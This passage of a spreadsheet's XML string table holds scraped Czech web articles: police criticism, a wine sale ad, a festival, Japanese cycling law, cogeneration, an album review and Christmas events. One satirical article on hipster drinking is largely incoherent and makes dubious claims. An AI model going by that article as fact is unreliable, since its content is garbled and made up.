    <t>Shrnutí „Ještě horší, než si myslíte.“ Bývalý policista začal mluvit Český internet už před několika dny oběhl text policisty, který popisoval smutnou realitu fungování českého policejního sboru za současné vlády. Jeho autor Martin Červenka v něm prý chtěl poukázat na amatérismus vedení a nemohoucnost policejních odborů. Za své vyjádření se dočkal oficiální výtky. Není ovšem jediný, kdo pod svým jménem poukázal na chyby. Dlouhý text odkrývající zákulisní fungování Policie České republiky je k dispozici na webu Konec PČR , kam ho Červenka umístil. „Pracuji u Policie ČR dvacet let. Deset let jsem byl řadový policista, posledních deset let pracuji jako vedoucí útvaru. Miloval jsem svojí práci a chodil do práce s radostí, ale už to tak nemám. Politický amatérismus, neschopné vedení policie a impotence policejních odborů policii přivedla k personálnímu i finančnímu krachu. Z mého pohledu není jiná cesta než komplexní obsáhlá reforma policie. Prostě už to nejde dál. Už nemohu přihlížet tomu, jak ohýbají počty policistů, jak z občanských zaměstnanců dělají policisty (aby mohli dále lhát), jak neustále zvyšují počet "policistů", kteří něco "řídí" nebo "kontrolují", jak neustále zvyšují pracovní a administrativní zatížení policistů v brutálních podstavech, jak okázale dělí policisty na "chovné" a na "tažné", jak policistům nedají prostor k základnímu výcviku, jak utrácejí nesmyslně peníze, a tak dále,“ napsal v textu Červenka. Následně se pustil do ostrých vyjádření týkajících se nedostatečných počtů policistů, slučování služeben, striktních zákazů předávat informace o personálních stavech, snižování rozpočtu, administrativní zátěži, političnosti sboru či porušování zákonů. „Víte o tom, že když bydlíte mimo Prahu , jste pohledem policejních postupů občanem druhé kategorie? Víte o tom, že jsme za poslední dva roky přijali přes 500.000 uprchlíků a zároveň snižovali rozpočet policie? Víte o tom, že jsou místa, kde jsou ve službě dva policisté na několik desítek tisíc lidí? Víte o tom, že u policie slouží velké množství policistů, kteří nejsou policisté (nikdy policejní práci ani neviděli) a stejně budou příjemci renty? Víte o tom, že i když je škoda trestným činem např. 15 tisíc korun a je jasné, že není šance pachatele vypátrat, vyhodnocují se stopy za 20 tisíc korun?” to je jen malý výčet toho, o čem se policista rozepsal. Textu si všimlo i vedení Policie ČR. Podle dokumentu, který je nazván Záznam významné události a který je umístěn na sociálních sítích, se Martin Červenka dočkal výtky a upozornění. Některé jím uvedené informace prý nejsou podle dokumentu pravdivé. Například ta o služebním zařazení autora, Červenka není vedoucí útvaru, je služebně zařazen jako zástupce vedoucího obvodního oddělení. „Dále jste se v textu své úvahy zveřejněné na výše uvedených stránkách negativně vyjadřoval k některým činnostem vykonávaných Policií České republiky , čímž jste mohl vzbudit nedůvěru v Policii České republiky jako instituce. Současně jste se v textu své úvahy nechoval v souladu se služební zdvořilostí vůči dalším policistům,“ stojí dále ve výtce, která je umístěna na sociálních sítích. Její zveřejnění vyvolalo mezi lidmi vlnu nevole a ozývá se množství hlasů potvrzujících tvrzení Martina Červenky a označujících postup jeho nadřízených za šikanózní. Bývalý vysoce postavený policista a odborník na bezpečnostní problematiku Michal Diblík nám k věci řekl, že dle informací, které má od bývalých kolegů, může vše potvrdit a pro ilustraci uvádí, že například na největším obvodním oddělení krajského města, jako je Olomouc , které má na starosti kriminalitu celého centra, je běžné, že přes všední den je k dispozici pouze jedna dvoučlenná motorizovaná hlídka a činnost státní policie musí tedy ve velkém suplovat městští strážníci. „Zkuste si ovšem reálně představit, jaká je bezpečnost občanů například v odlehlých vesnicích v malých okresech. Nemáte šanci se dočkat pomoci policie,“ řekl pro PrahaIN.cz. Dle jeho zkušeností je za tímto stavem amaterismus a neschopnost policejních funkcionářů, kteří prý jen uměle vylepšují čísla a snaží se zalíbit politikům, aby mohli dále sedět ve svých teplých křeslech. „Poté jsou odměňováni stotisícovými částkami, obrovskými rentami a ti, kteří řídili pod vlivem alkoholu , jako například olomoucký ředitel Landsfeld, dostávají generálské hodnosti, zatímco řádoví policisté na obvodních odděleních doslova padají na hubu,“ dodává Diblík. „Není možné, aby sekretářky krajských ředitelů či personalisté dostávali vysoké důstojnické hodnosti a na obvodním oddělení neměl kdo sloužit,“ dodal Diblík. Na podobný problém byla naše redakce upozorněna také na krajském ředitelství Praze . Zde mělo dojít na odboru plukovníka Engelmana k uvedení do hodnosti kapitánů hned několika dříve civilních osob, občanských zaměstnanců. Řekl nám to Engelmanův kolega, letitý kriminalista. Mluvčí krajského policejního ředitelství Jan Daněk však vysvětlil, že za posledních pět let bylo do služebního poměru v osmé tarifní třídě přijato pouze osm policistů. S redakčním přispěním Jana Holoubka . Autor: Adéla Houbová Autor person Adéla Houbová</t>
  </si>
  <si>
    <t>6600</t>
  </si>
  <si>
    <t>7370</t>
  </si>
  <si>
    <t>20241101_349_3264789710_7be8bf26f3a88e251406.html</t>
  </si>
  <si>
    <t>7be8bf26f3a88e251406</t>
  </si>
  <si>
    <t>Když se sklenka stane uměleckým dílem: jak pití alkoholu získává na popularitě mezi esoterickými hipstery</t>
  </si>
  <si>
    <t>Když se sklenka stane uměleckým dílem: jak pití alkoholu získává na popularitě mezi esoterickými hipstery autor: Redakce Nezdrave.cz | 01.11.2024 | Chlast Perex: Když chlast ání přestává být jen prostou extází a stává se kultovním rituálem, je na čase zjistit, jak se z pospolitého popíjení stal tak trochu magický zážitek. Město je plné malých barev, kde se šňupací sklo mění na umělecké dílo, a právě tam se setkáte s lidmi, kteří umějí brát život s nadhledem a přitom zásadně odmazat svá tíživá každodenní dilemata. A co teprve kombinace artisanálních nápojů s jednoduchým požitkem? Dnešním tématem je duchovního chlast ání, kde se tradice setkává s moderním pojetím zábavy, a to s příchutí lehkého humoru. Pojďme se ponořit do světa trendy drinků, které nám dnes netradičně rozjasní šedivé dny. Ti, kdo znají heslo „carpe diem“, si často užívají spíše o páté ráno než ve zkušebních komorách s depresí a absintem. A zatímco loni dominovaly vyšňořené cocktail bary, letošní hit už má svůj typický rituál a legendární příchuť – jmenuje se „kombucha s gin“. Válet se v opojné lahůdce, která je příjemně šumivá a skoro, ale opravdu skoro zdravá, je senzace, při které si hipsteři vkládají do dlaní kostky ledu a nebojí se sdílet fotky se zrobeným cévnatým drinkem na Instagramu. Artisanal mileniál vs. zlaté ručičky boomerů Jak se ovšem jednou ptal klasik, jaké je nejhezčí sklo? Samozřejmě, že Kristal. Ale co takhle zapojit náměty ze školních dnů? Ruský šaman s umiocistentními brýlemi na nose k nám promlouvá skrze umění destilace. Je to vrstevnatý, krásně voňavý, ale dost klikatý svět, kde každý generuje hustou atmosféru v místních podnicích, zatímco nabíjí ekosystém niche drinků. Takže mileniálové s jejich Instagramem v kapse a boomerové vzpomínající na státní podniky se mohou posmediálně setkat na půli cesty. Jasně, že my, co přecházíme mezi generacemi, umíme vychutnat si alespoň ze dvou pohledů. Zatímco boomerové skoro vzdychají nad svým obyčejným zeleným vínem , pro mileniály je osm kousků přelitého barevného moštu na zbláznění důvodem zůstat na starém městě a pohánět tak svou existenci umělým šumem. A přitom se snaží zakrýt svá zamyšlená já, zatímco se v pozadí ozývá směsice nakřáplých tónů od espresso barů a klasických tiki barů. Koho zajímají tradice, když je možnost chlastu ve fashion balení? Ne že bychom tento styl mohli brát na lehkou váhu, ale přiznejme si, že být moderním potkanem ve večerním obležení špičkovými drinky má své tempo. A teď pozor – víte, že v některých zemích, jako je například Japonsko , dokonce prudce stoupá poptávka po „kožených“, tedy uměle vytvořených kořeněných lístcích, které zas na základě bizarní tradice chlastačkému umění dávají schopnost nosit takové označení, jako byste nosili na krku medaili? Jasně, že v tomhle světě se dá trochu zavtipkovat a najít si vlastní koutek umění, které vás více než zaujal je schopno nadchnout. Ale přeci, co na tom záleží? Vždyť chlast je jen přestupek bez bolesti. Nové trendy plně kvetou a pití se stává nástrojem nejen seberealizace, ale i skvělé příležitosti, jak si na chvíli ulehčit od pozemských strastí. Tak si sedněte, udělejte si pohodlí, vezměte do ruky skleničku a vychutnejte si tu atmosféru. Vítejte ve světě koulí a skleněných lahví, kde se magické chlastání stalo malou revolucí. Žijeme v době, kdy se nápady nesmazatelně vpíjí do čirého vína , a my jsme na něj hrdí, protože v konečné fázi, kdo by nebyl? Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_35_3264594364_bd904444ade479e5e6ad.html</t>
  </si>
  <si>
    <t>bd904444ade479e5e6ad</t>
  </si>
  <si>
    <t>Výprodej lahví za velkoobchodní ceny</t>
  </si>
  <si>
    <t>Výprodej lahví za velkoobchodní ceny Prodám víno 1.11.2024 Vyprodáváme zásoby lahvového vína ze sklepa, odrůdy MT,SG,RV,RB,ZW,SV a cuvé, ročníky 2018-2022. Vína jsou mz a nebo zatříděná s přívlastkem a kontrolované komisařem a na vše jsou samozřejmě rozbory a po dohodě lze zatřídit vše (pozdní sběr, výběr z hroznů atp). Vše je lahvováno přes linku a víno je v pořádku, včetně starších ročníků které jsou výborné jen ne tak svěží. Možnost zakoupení lahví bez etiket což je výrazně levnější, je to výborné řešení pro firmy, svatby, hotely atp. co chtějí svou vlastní etiketu (údaje o víně pro svou etiketu samozřejmě dodáme). Některé odrůdy ve výprodeji za velmi krásnou cenu. Jsme pro dlouhodobou spolupráci s vinotékami, hotely, gastro zařízeními atp. ale i pro jednorázový prodej. Vše jsou naše Pálavská vína z našich vlastních vinic přímo pod Pálavou a výprodejem za velmi nízké ceny prakticky nákladové ceny chceme docílit nejen prázdného sklepa s novou úrodou ale i novými investicemi do vinařství a modernizaci. Vše je oficiální a ke všemu je doklad. Ceny jsou dle množství a odrůdy Od 49kč/lahev Minimální odběr od 5000,- kč Cena je bez balného, můžete si vzít vlastní bedny nebo kartony pro převoz nebo vám můžeme prodat naše Vzorky lahví s sebou na ochutnání jsou za plnou tržní cenu (malý odběr). Jinak ochutnat je možno na místě a zdarma. Ceny platí do vyprodání zásob. Kontakt: 773 691 314 Autor: Vaclav44</t>
  </si>
  <si>
    <t>2430</t>
  </si>
  <si>
    <t>20241101_350_3264788577_1c64cb5932a38b1f3f81.html</t>
  </si>
  <si>
    <t>1c64cb5932a38b1f3f81</t>
  </si>
  <si>
    <t>Festival Setkání národů v Hradci Králové</t>
  </si>
  <si>
    <t>Festival Setkání národů v Hradci Králové Přijměte, prosím, naše srdečné pozvání na tradiční přátelský FESTIVAL SETKÁNÍ NÁRODŮ, který se uskuteční v úterý 12. listopadu 2024 od 9 do 20 hodin v hradeckém Adalbertinu (Čs. armády 300). Zdroj: Diecézní katalická charita Hradec Králové POZNEJTE S NÁMI BARVY SVĚTA Přidejte se i vy a poznejte s námi barvy světa na 11. ročníku hradeckého festivalu Setkání národů. Svou kulturu a umění vám představí přes 25 zemí čtyř kontinentů. Připravili jsme pro vás nové etnické workshopy a ochutnávky, ukázky národních oděvů a výrobků, multikulturní koncert a výstavy. 9:00 – 14:30 – PROGRAM PRO ŠKOLY • 15:00 – 20:00 – PROGRAM PRO VEŘEJNOST 15:00 – 17:30 – ETNICKÉ WORKSHOPY A OCHUTNÁVKY: CAPOEIRA • AFRICKÉ BUBNOVÁNÍ • MALOVÁNÍ HENNOU • NÁRAMKY PŘÁTELSTVÍ • MONGOLSKÁ SHAGAI • ORIENTÁLNÍ PŘÍPRAVA ČAJE A KÁVY • TAJEMSTVÍ JMÉNA • PLETENÍ COPÁNKŮ • ZDOBENÍ KORÁLKY • THAJSKÝ „KRA TONG“ • MEXICKÉ “PAPEL PICADO“ 18:00 - 20:00 MULTIKULTURNÍ KONCERT: • AXÉ CAPOEIRA (ČR &amp;amp; Brazil) • Afro Dance &amp;amp; Drums: ROBEN MLAUZI ( Zimbabwe ) &amp;amp; DIVOKÉ BUBNY (ZOO Dvůr Králové) • KINTARI ( Indonésie ) – tanec v maskách • BETY ( Vietnam ) • ALVINA AGHAJANYAN ( Arménie ) • Mongolské tance • KHATTYA - břišní tance • MARY ANGELIA ALFRED ( Indie ) • MARIA IWISEH ( Egypt ) • ADRIELY SOARES MACIEL (brazilské Frevo) • ČERVÁNEK (ČR) • RADISŤ a YURII BALEHA ( Ukrajina ) DOPROVODNÉ VÝSTAVY: • OBRÁZKY UKRAJINSKÝCH DĚTÍ NA TÉMA „PTÁCI MÍRU“ • UKRAJINSKÉ KROJE A VÝŠIVKY • VÝTVARNÉ PRÁCE CIZINCŮ Z POS MV ČR KOSTELEC N. O . • FOTOVÝSTAVA Z INDIE „ASHA ZNAMENÁ NADĚJE“ • FARAÓNSKÝ EGYPT Vstup je zdarma. Podrobný program najdete v přiložené pozvánce a na našich stránkách zde. Festival pořádá Integrační centrum pro cizince Diecézní charity HK ve spolupráci se Statutárním městem Hradec Králové , Královéhradeckým krajem , Filozofickou fakultou UHK, Ministerstvem vnitra ČR, SUZ MV ČR - PoS Kostelec n. O. a Regionálním ukrajinským spolkem ve VČ. Záštitu nad akcí převzala primátorka města Hradec Králové . Spolufinancováno Evropskou unií . Těšíme se na setkání s Vámi! Pozvěte i své přátele a děkujeme za sdílení událost Setkání národů na vašich sociálních sítích. Více také na www.cizincihradec.cz a www.hk.caritas.cz. Zdroj: Diecézní katolická charita Hradec Králové</t>
  </si>
  <si>
    <t>84</t>
  </si>
  <si>
    <t>20241101_351_3242743519_8b0f29200a8b731356df.html</t>
  </si>
  <si>
    <t>8b0f29200a8b731356df</t>
  </si>
  <si>
    <t>Za používání telefonu během jízdy na kole v&amp;nbsp;Japonsku ode dneška...</t>
  </si>
  <si>
    <t>Za používání telefonu během jízdy na kole v&amp;nbsp;Japonsku ode dneška... Za používání telefonu během jízdy na kole v Japonsku ode dneška hrozí až půl roku vězení – a až rok, když cyklista kvůli mobilu způsobí nehodu. Zakázáno je přitom i pouhé sledování displeje, nejen telefonování nebo posílání zpráv. Tresty přitvrdily i za jízdu pod vlivem alkoholu : až tři roky vězení, potažmo půlmilionová pokuta. (Kjódó) Autor: Magdalena Slezáková Autor Magdalena Slezáková Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>20241101_352_3242823860_0ef7d3e33f1f6a89eb1c.html</t>
  </si>
  <si>
    <t>0ef7d3e33f1f6a89eb1c</t>
  </si>
  <si>
    <t>Společná výroba elektřiny a tepla jako pojítko mezi zelenými zdroji a jádrem</t>
  </si>
  <si>
    <t>Společná výroba elektřiny a tepla jako pojítko mezi zelenými zdroji a jádrem Rubrika: ■ Energetika jan.broz@hn.cz Výroba sladu, jedné ze základních surovin piva , je extrémně náročná na teplo. Takzvané hvozdění, tedy sušení ječného sladu, probíhá při teplotách od 50 do 85 stupňů Celsia, aby se z ječmene uvolnily látky důležité při výrobě národního nápoje. Sladovny Soufflet ve svém závodě v Kroměříži proto letos v srpnu dokončily instalaci kogenerační jednotky o výkonu jednoho megawattu. Vysoce efektivní zařízení vyrábějící vedle elektřiny právě i teplo pomůže společnosti ušetřit až jeden milion korun ročně. „V současnosti provozujeme na 170 kogeneračních jednotek po celém Česku a jejich počet dál roste. Jsou ideálním zařízením, které kombinuje výrobu tepla i elektřiny a je čím dál důležitějším decentrálním teplárenským zdrojem a efektivním nástrojem dekarbonizace teplárenství a energetiky obecně,“ prohlásil Kamil Čermák, generální ředitel ČEZ ESCO , který jednotku v kroměřížských sladovnách instaloval. Obdobné jednotky přitom už fungují v provozech Sladoven Soufflet v Nymburce , Hodonicích a Prostějově . S energetickou krizí se přitom rozvoj kogenerace, tedy vysoce efektivní přeměna zemního plynu, biomasy či jiného paliva na teplo a elektřinu, značně zpomalil. Přibylo-li podle dat Energetického regulačního úřadu ( ERÚ ) v rekordním roce 2017 celkem 91 jednotek s výkonem do pěti megawattů, loni to bylo jen 22. Podle ředitele odboru podporovaných zdrojů ERÚ Kristiana Titka odradila investory jednak nejistota ohledně cen zemního plynu, jednak také zpožděná notifikace podpory pro kombinovanou výrobu elektřiny a tepla (KVET) ze strany Evropské komise . Z dostupných dat za letošní rok je však patrné, že výstavba kogenerací se po útlumu opět rozjíždí, a málokteré téma je aktuálně v energetice více diskutované. „Bez kogenerace se neobejdeme,“ říká Jan Krčál, analytik think- -tanku Fakta o klimatu a spoluautor studie Výroba elektřiny v Česku bez uhlí. Kombinovaná výroba je mnohem účinnější než samostatná produkce jedné či druhé komodity. Podle studie Dekarbonizace teplárenství pražského ČVUT dosahuje účinnosti 90 až 95 procent. To je výrazně více než u oddělené výroby obou komodit, kde je tato hodnota sotva poloviční. Hlavní důvod očekávaného rozvoje kogenerací je skryt v samotném názvu zmíněné analýzy Fakta o klimatu. Očekává se, že uhelné elektrárny kvůli nerentabilitě brzy skončí. Podle dostupných analýz, jako je třeba takzvaný superkritický scénář provozovatele přenosové soustavy ČEPS, by zásobování Česka elektřinou bez většiny uhelných zdrojů nemělo být ohroženo. Jinak je tomu však s teplárnami. Rozsáhlou českou a v evropském kontextu unikátní síť centrálního zásobování teplem (CZT), na kterou je napojeno 1,8 milionu domácností, chce stát zachovat. „Teplárny zásobují teplem spoustu domácností, ty nelze jen tak vypnout. A také spousta průmyslových podniků odebírá teplo,“ uvádí Krčál. Čistě technicky probíhá kogenerace i v uhelných teplárnách. Podle Zprávy o provozu teplárenských soustav ERÚ za loňský rok tak polovina tepla z kombinované výroby pocházela z hnědého uhlí. Spolu s uhelnými elektrárnami však skončí i hnědouhelné lomy, ze kterých se dnes teplárny zásobují. Výjimkou je lom Bílina dodávající do elektrárny Ledvice, s jejímž odpojením se počítá až na samém závěru odchodu od uhlí. Uhlí z jednotlivých lomů má však rozdílnou kvalitu a ne ve všech teplárnách bude možné bílinskou komoditu využít. I uhelné teplárny tak bude nutné postupně přetransformovat na kogeneraci využívající plyn a biomasu. Důležitým milníkem byla notifikace podpůrného programu v objemu 75 miliard korun ze strany Evropské komise letos v květnu. Tato částka však nebude zdaleka stačit. Jen ČEZ , jehož teplárenské zdroje zásobují zhruba pětinu na CZT napojených domácností, počítá s investicemi do tepláren ve výši 60 až 80 miliard. Poradenská společnost EGÚ Brno odhaduje výši investic do náhrady uhelného tepla na 900 miliard korun. Investice jsou už přesto v běhu. Například ČEZ buduje plynové kogenerace v Mělníce , Dětmarovicích , Trmicích či Prunéřově. Podle zatím neschváleného vnitrostátního plánu v oblasti energetiky a klimatu (NECP – National Energy and Climate Plans) leží však větší potenciál než u velkých zdrojů s výkonem nad pět megawattů u středních a malých kogenerací jako například v Kroměříži . Jde o jeden z nejdůležitějších strategických dokumentů nastavující směřování tuzemské energetiky v dalších desetiletích, který musí všechny členské země EU předložit Evropské komisi . „Potenciál rozvoje vysokoúčinné KVET byl identifikován zejména u menších zdrojů s elektrickými výkony na úrovni jednotek megawattů. Bude pravděpodobně spočívat ve zvyšování počtu mikrokogeneračních jednotek (s kapacitou nižší než 50 kilowattů), malých (kapacitou nižší než jeden megawatt) a středních zdrojů s KVET na bázi zemního plynu,“ píše se v návrhu NCEP. Vedle zachování výroby tepla má totiž kogenerace sehrát důležitou roli ještě v jednom bodě. S odchodem uhlí zmizí z trhu i řiditelné zdroje, které dokážou vyrovnávat rozdíly mezi výrobou a spotřebou. Většina obnovitelných zdrojů poskytovat takzvané služby výkonové rovnováhy (SVR) neumí, nebo jen za využití „prostředníka“ v podobě velkokapacitních baterií, kterých je zatím v Česku stále málo. Flexibilní kogenerace však dokáže SVR přenosové soustavě zajistit. „Energetika potřebuje flexibilní zdroje, které mají dobrou ekonomiku, i když vyrábí jenom několik hodin denně a třeba i několikrát za den nemají technologický problém během několika minut najet a zase vypnout,“ říká Václav Klein , šéf tuzemského výrobce kogeneračních jednotek Gentec CHP. Přeskupení na několikamiliardovém trhu SRV už probíhá. Dříve dominující uhelné hráče stále více vytlačují moderní technologie, jako jsou právě kogenerace či baterie řízené takzvanými agregátory. Jde o systémy, které propojují a automaticky řídí několik menších zdrojů. Zaznívá tak, že právě kogenerace se má vedle jádra a obnovitelných zdrojů stát třetí nohou budoucího energetického mixu Česka . Podle odhadů bude třeba po konci uhlí vybudovat nové řiditelné zdroje o výkonu pět až osm gigawattů. Podle oborového sdružení Cogen Czech mají kogenerační jednotky potenciál pokrýt z toho až 4,5 gigawattu. Jako palivo lze využít nejen plyn. Počítá se s využitím biomasy, u které však může být problém s dostupností. Nová strategie ministerstva zemědělství chce nasměrovat více odpadu vznikajícího při zpracování dřeva do dřevovláknitých či dřevotřískových desek využívaných při výrobě nábytku nebo ve stavebnictví, čímž by mohla biomasa chybět. Podporovatelem staveb ze dřeva je přitom třeba i nový ministr průmyslu Lukáš Vlček (STAN). Spalovat lze však také nízkoemisní plyny, jako je bioplyn, který už se dnes masivně využívá v bioplynových stanicích, dále biometan, kalové a důlní plyny a v budoucnosti vodík. Výrobci každopádně hlásí, že poptávka po kogeneračních jednotkách roste. „Zájem o zapojování plynových kogeneračních jednotek do služeb výkonové rovnováhy a trhu s flexibilitou enormně stoupá. V tuto chvíli připravujeme na českém trhu další obdobné dodávky objemu přesahujícího 30 megawattů,“ vyčísluje Klein . Článek vznikl ve spolupráci se společností ČEZ Kroměříž Nejen Sladovny Soufflet v Kroměříži nedávno zprovoznily kogenerační jednotku. Vysoce efektivní zdroje pro výrobu elektřiny a tepla se mají stát v tuzemské energetice klíčovým prvkem. Foto: ČTK Dříve dominující uhelné hráče stále více vytlačují moderní technologie, jako jsou právě kogenerace či baterie. Autor: Jan Brož Autor Jan Brož Rubrika transition_slide ■ Energetika</t>
  </si>
  <si>
    <t>138000</t>
  </si>
  <si>
    <t>20241101_353_3242717079_88b8fe2db67fbbb90c89.html</t>
  </si>
  <si>
    <t>88b8fe2db67fbbb90c89</t>
  </si>
  <si>
    <t>Návaz</t>
  </si>
  <si>
    <t>Návaz 1 2 448339 307298 215477 204322 186015 172848 171509 138061 112860 102914 Tuzemské recenze na „Návaz“ takřka bez výjimky naznačují velkolepá očekávání od přední domácí kapely a chválí, že se jí podařilo mezinárodně prorazit s češtinou. Dále už se však příliš nezamýšlejí, co to znamená. Pokusme se o to my. Skutečnost, že „Návaz“ vyšel u Season of Mist – jednoho z největších metalových vydavatelství na světě, které navíc hledí na kvalitu a nikoliv to, aby bylo co nejvíce „legendary a epic“ – je bezesporu papírově největším úspěchem české kapely v posledních letech, který nelze brát na lehkou váhu, ale ani přeceňovat. Rozhodnutí labelu prezentovat SSOGE jako folkmetalový spolek naznačuje, že i Francouzi pocítili nutkání dát prostor aktuálně nejvíce táhnoucímu metalovému subžánru. Skutečnost, že se tak stalo právě u Season of Mist (a nikoliv třeba Napalm Records), však zůstává lichotivá. A pokud jde o češtinu, je otázkou, zda to (od labelu, ne kapely) vnímat jako něco odvážného, anebo právě naopak krok do jistoty v podobě vítaného puncu exotiky, který pomáhá metalové kapely koketující s folklórem prodávat. Důležitější nicméně je, že čeština do výrazu kapely velice dobře sedí. Každý na ně musí mít názor SSOGE se nacházejí ve fázi, kdy se k nim všichni cítí povinováni vyjádřit, a mít na ně (dostatečně vyhraněný) názor se stalo koloritem každé debaty o metalu vedené při zvětralém pivu konzumovaném z imitace rohu. SSOGE jsou v českém prostředí ztělesněním píle i decentního... číst dále Tuzemské recenze na „Návaz“ takřka bez výjimky naznačují velkolepá očekávání od přední domácí kapely a chválí, že se jí podařilo mezinárodně prorazit s češtinou. Dále už se však příliš nezamýšlejí, co to znamená. Pokusme se o to my. Skutečnost, že „Návaz“ vyšel u Season of Mist – jednoho z největších metalových vydavatelství na světě, které navíc hledí na kvalitu a nikoliv to, aby bylo co nejvíce „legendary a epic“ – je bezesporu papírově největším úspěchem české kapely v posledních letech, který nelze brát na lehkou váhu, ale ani přeceňovat. Rozhodnutí labelu prezentovat SSOGE jako folkmetalový spolek naznačuje, že i Francouzi pocítili nutkání dát prostor aktuálně nejvíce táhnoucímu metalovému subžánru. Skutečnost, že se tak stalo právě u Season of Mist (a nikoliv třeba Napalm Records), však zůstává lichotivá. A pokud jde o češtinu, je otázkou, zda to (od labelu, ne kapely) vnímat jako něco odvážného, anebo právě naopak krok do jistoty v podobě vítaného puncu exotiky, který pomáhá metalové kapely koketující s folklórem prodávat. Důležitější nicméně je, že čeština do výrazu kapely velice dobře sedí. Každý na ně musí mít názor SSOGE se nacházejí ve fázi, kdy se k nim všichni cítí povinováni vyjádřit, a mít na ně (dostatečně vyhraněný) názor se stalo koloritem každé debaty o metalu vedené při zvětralém pivu konzumovaném z imitace rohu. SSOGE jsou v českém prostředí ztělesněním píle i decentního experimentování, které jim spolu s tím, že si hračičkářsky dávají s novými deskami načas, zajišťuje pozornost. Kapela vystihuje hodnoty sdílené řadovými metalisty (píle, instrumentální kvality, důraz na tradici), ale tím, jak nestojí na místě, oslovuje i náročnější posluchače, kteří chtějí se svými oblíbenými hudebníky růst, nikoliv brnkat na stále stejné noty. V tomto ohledu naplňují ideu kvalitního metalového mainstreamu, ztělesňovaného typicky labelem Redblack, u něhož koneckonců dříve vydávali. Odlišná minulost i někdejší spojení s jinou dodnes aktivní výlučnou persónou české tvrdé scény, pak vyvolávají silné emoce. Z kapely, která s vážnou metalovou tváří hrála nesporně tvrdou hudbu, se stala kapela hledící si své veřejné prezentace a s posílenou rolí houslí i cimbálu se nezdráhající juchanic v čele se „Slavou“. Odstup dávných příznivců je tedy do jisté míry pochopitelný, ale „ideologicky“ se s ním nedokážu ztotožnit, což platí o to více, že „mít jasno o SSOGE“ většinou znamená též nulovou ochotu vstřebávat jejich nový styl. Je taky celkem zajímavé, že fanoušci stávající tváře kapely nejsou podobně vyhranění vůči staré epoše, i když to bude dost možná dáno tím, že „vyměknout“ je chápáno jako větší prohřešek než „hrát tvrdě“. Nemluvě o tom, že fanoušci nové epochy tu starou prostě neznají, zatímco „pamětníci“ cítí puzení komentovat současný stav kapely, jakkoliv jim nic neříká. Každá oslava má svůj důvod Na albu „Návaz“ SSOGE bezesporu završili své hledání osobité podoby metalu snoubícího se s folklórem, zároveň však dopustili, aby ten místy okatě vyčníval. Některé obrazy matky Země a jim podobné, které mohou vyvolávat dojem kýčovitosti, jsou bezpochyby vrostlé do folklóru z dob, k nimž se SSOGE obracejí. S tím, jak čas postupoval směrem do let, kdy se folklór začal kamarádit s metalem, ovšem holt získaly jiný a nezřídka právě kýčovitý nádech. Jak toto spojení přijmeme, se tak bude odvíjet od toho, nakolik svébytný tvar se kapele podaří vytvořit, a jak si v něm stopy starých časů budou stát. Zde působí spojení starobyle vyhlížejících textů s moderním stylem dostatečně soudržně, dojem nedostatečnosti vyvolává spíše instrumentální pojetí. Ani ne tak vystupující instrumentální party hrané na cimbál či housle, jako monotónnost modelu „dva riffy proložíme dvěma tahy smyčce“ a zejména setrvalou násilnost přechodů mezi tempy, kterých album s cílem budovat vícero nálad používá nemálo. SSOGE rovněž šíří podivnou iluzi, že na folklóru musí být něco vzletného. Tyto nešvary se však vyjevují až s postupem desky, která sice ke konci ztrácí na dramatičnosti a je emocionálně velice nedůrazná, ale na začátku zní takřka neprůstřelně. Úvodní skladby jsou jako rozhlasová hra: zakazují si byť jen na vteřinu polevit, celkově jsou velice hutné, pořád se v nich něco děje a ve vší té vypracovanosti naštěstí není cítit upocenost. Album je pořád více hnáno umem než nutkáním fidlat, jak žánr káže. Chtít po „Slavě“, aby byla méně rozjuchaná, by šlo proti nátuře té písně i jejího sdělení (oslavovat doom metalem holt nelze). Což ale nic nemění na tom, že právě touto medovinovou tančírnou jde kapela zatím nejvíce na ruku těm posluchačům, kteří mají dojem, že by folk metal měl nahradit hodiny dějepisu. Něco podobného pak činí i při vokálním naplňování manýry „kráska a zvíře“, která je do metalu žel tak vrostlá (i ohraná), až zamezuje uvědomit si, že by to šlo i lépe a důvtipněji. Což zde platí o to víc, oč jednostrunněji vyznívá mužský zpěv. Ten je neschopný větší pestrosti a v momentech, kdy se o ní pokouší („Dva stíny..“), vyznívá v celé své stylizovanosti jako vtip. SSOGE se našli ve stylu, který sice není úplně původní, ale z podstatné části si ho sami zformovali. Spojení s lidovými nástroji dává větší smysl, než by naznačovaly kašpárkoviny s amulety přibalenými k CD. Pro opravdu jedinečné vyznění ale kapela pořád až příliš setrvává v určitých stereotypech, které se ani za posledních pět let neodnaučila, a které si k jejímu štěstí v mezičase získaly mnoho nových fanoušků. recenzi poskytnul hudební server Aardvark Autor: Viktor Palák Vydavatelství: Season of Mist Typ alba: řadové album Rok vydání: 2011 Hodnocení autora: % 80.00% Autor: Viktor Palák Autor person Viktor Palák</t>
  </si>
  <si>
    <t>664</t>
  </si>
  <si>
    <t>225</t>
  </si>
  <si>
    <t>20241101_354_3242716508_cc11fcab21d9baec801d.html</t>
  </si>
  <si>
    <t>cc11fcab21d9baec801d</t>
  </si>
  <si>
    <t>Třinec rozsvítí stromeček 1. prosince. Co nás čeká na jarmarku a jaký program přinesou adventní podvečery?</t>
  </si>
  <si>
    <t>Třinec rozsvítí stromeček 1. prosince. Co nás čeká na jarmarku a jaký program přinesou adventní podvečery? Naše město se začne oblékat do „svátečního hávu“ postupně od pátku 29. listopadu letošního roku. Stromeček na náměstí Svobody rozsvítíme přesně za měsíc - první adventní neděli 1. prosince v 17 hodin. I letos se Třinečtí mohou těšit na několik „světelných“ novinek. Na náměstí T.G.M. město nainstaluje nové dekorace na sloupech veřejného osvětlení a chybět nebude 3D baňka, tentokrát v barvě bílo-zlaté. Nové baňky, zvonky a hvězdy budou umístěny na náměstí Míru . Světelné krápníky pak budou viset na nadjezdu na ulici Závodní ze strany od „myší díry“. Vánoční jarmark s Olgou Lounovou i kapelou Jelen Rozsvícení vánočního stromečku bude jedním z bodů programu Vánočního jarmarku. Ten bude v neděli 1. prosince na náměstí Svobody a ve vnitřních prostorách Trisia probíhat již od 10 hodin a bude plný možností dobrého nákupu a bohatého programu pro všechny generace. V rámci jarmarku budou k vidění ukázky řemesel, stánky s vánoční tematikou a tvořivé dílničky. O kulturní program a dobrou náladu se postará zpěvačka Olga Lounová s kapelou, třinecká ZUŠ pod vedením Dariny Szymeczkové, kapely Maxim Turbulenc, Crossband nebo Spotlight. Těšit se můžete na pohádku „S čerty nejsou žádné 